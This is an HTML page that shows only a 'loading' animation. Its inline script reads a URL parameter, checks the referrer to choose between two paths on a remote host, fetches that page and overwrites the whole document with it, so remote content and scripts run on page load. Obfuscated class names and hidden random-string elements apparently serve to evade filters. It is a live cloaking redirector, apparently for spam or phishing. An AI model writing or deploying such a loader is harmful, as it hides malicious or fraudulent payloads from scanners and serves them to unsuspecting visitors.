<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .JyiEzGV {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .JyiEzGV .hVRb6trbr3R {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .JyiEzGV .content {
            line-height: 50px;
            text-align: center
        }

        .JyiEzGV .img {
            width: 100%
        }

        .JyiEzGV .BXkcLUa72 {
            text-align: center
        }

        .JyiEzGV .BXkcLUa72 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .JyiEzGV .BXkcLUa72 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .JyiEzGV .BXkcLUa72 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .JyiEzGV .BXkcLUa72 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .JyiEzGV .BXkcLUa72 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .JyiEzGV .BXkcLUa72 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .JyiEzGV .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function rTFZX1qocQ9(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var dTsNa = rTFZX1qocQ9('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ dTsNa +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ dTsNa +".html?a=share";
		}
		
        T6WeBr=url+"#"+new Date().getTime();
        T6WeBr && function() {
            $.get(T6WeBr, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >kwx3E0GNI24SlhDojUPEeC65cTkbuGw145Iqb7gW6Uhm6aPtd9eV8RF0IAr34aIPoB9H3KxpxC9LkpOP77IId</h1>
<h1 style='display:none' >kwx3E0GNI24SlhDojUPEeC65cTkbuGw145Iqb7gW6Uhm6aPtd9eV8RF0IAr34aIPoB9H3KxpxC9LkpOP77IId</h1>
<li style='display:none' >wMnDlfiXH6yPYpZHxV7uqdCzkJtV3MOY54UWvT56aqUEhXRDZKU0QFwY9MrdkerdODBy60tPEBHyqrXuNZFGD</li><div class="JyiEzGV">
    <div class="hVRb6trbr3R">
        <div class="BXkcLUa72">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>kJDNlXEVBiQYxyGEswtxDCtpuGlR1LxACt0CFRSwZL</div>
<a  href='#' style='display:none'>WfuLTMhHc3opPurU657CsOvE5J6H61lzyCfH4NUMSgNz9xOOaBvksJsUlm0NjnbsLUoSWljEY2qlL0x5M</a>
<span style='display:none'>RTxmAeKDM7JeTrhp65rXdNrtaAzFjLAFEREc8nAaCYb807f78mZ</span>
<span style='display:none'>RTxmAeKDM7JeTrhp65rXdNrtaAzFjLAFEREc8nAaCYb807f78mZ</span>
<li style='display:none' >XaQCq1tU48yacxw6S0YV151xSDfHg7PJErb0a8M9XcDLFakRVZ77t2i7uiVcIpIRin6C</li>
<h1 style='display:none' >ILtLmfrQ6YLqcSqUj8rxy</h1></body>
</html>